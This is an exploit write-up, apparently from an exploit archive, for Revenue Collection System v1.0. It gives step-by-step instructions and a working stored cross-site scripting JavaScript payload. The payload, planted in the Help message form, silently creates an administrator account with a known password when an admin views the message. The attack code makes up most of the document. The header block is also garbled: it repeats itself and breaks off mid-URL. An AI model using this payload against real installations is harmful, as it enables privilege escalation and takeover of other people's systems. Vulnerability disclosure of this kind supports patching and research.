# Exploit Title: Revenue Collection System v1.0 - Authentication Bypass via Stored XSS
# Exploit Author: Joe Pollock
# Date: November 16, 2022
# Vendor Homepage: https://www.sourcecodes # Exploit Title: Revenue Collection System v1.0 - Authentication Bypass via Stored XSS
# Exploit Author: Joe Pollock
# Date: November 16, 2022
# Vendor Homepage: https://www.sourcecodester.com/php/14904/rates-system.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/rates.zip
# Tested on: Kali Linux, Apache, Mysql
# CVE: T.B.C
# Vendor: Kapiya
# Version: 1.0
# Exploit Description:
# Revenue Collection System v1.0 suffers from a Stored Cross-Site Scripting vulnerability allowing an authenticated
# client user to add an administrative user account to the application then log in as the newly created admin.

To reproduce this exploit, log in as a client user then navigate to the 'Help' functionality (/index.php?page=help).
The help functionality is used to contact an administrator by sending a message. Paste the Javascript code below into the
'Your Message' textbox then click 'Send'. When an administrator views this message, an administrative user account will
be added to the application with username "admin_new" and password "Test123Test123". Using these credentials, it should
now be possible to log in to the application via the administrative login, here: /admin/login.php (Note: change the
'target', 'x_Username', and 'x_Passsword' as required).

<script>
var target = "http://localhost/rates/admin/usersadd.php";
var req = new XMLHttpRequest();
req.open("GET", target);
req.send();
var parser = new DOMParser();
resp = req.responseText
var document = parser.parseFromString(resp, "text/html");
var token = document.getElementsByName("token")[0].value;
var params = "token="+token+"&t=users&action=insert&&modal=0&x_Fullname=test&x_Username=admin_new&x__Email=test123%40test123.com&x_Passsword=Test123Test123&x_userLevelId=-1";
req.open("POST", target);
req.withCredentials = true;
req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
req.send(params);
</script>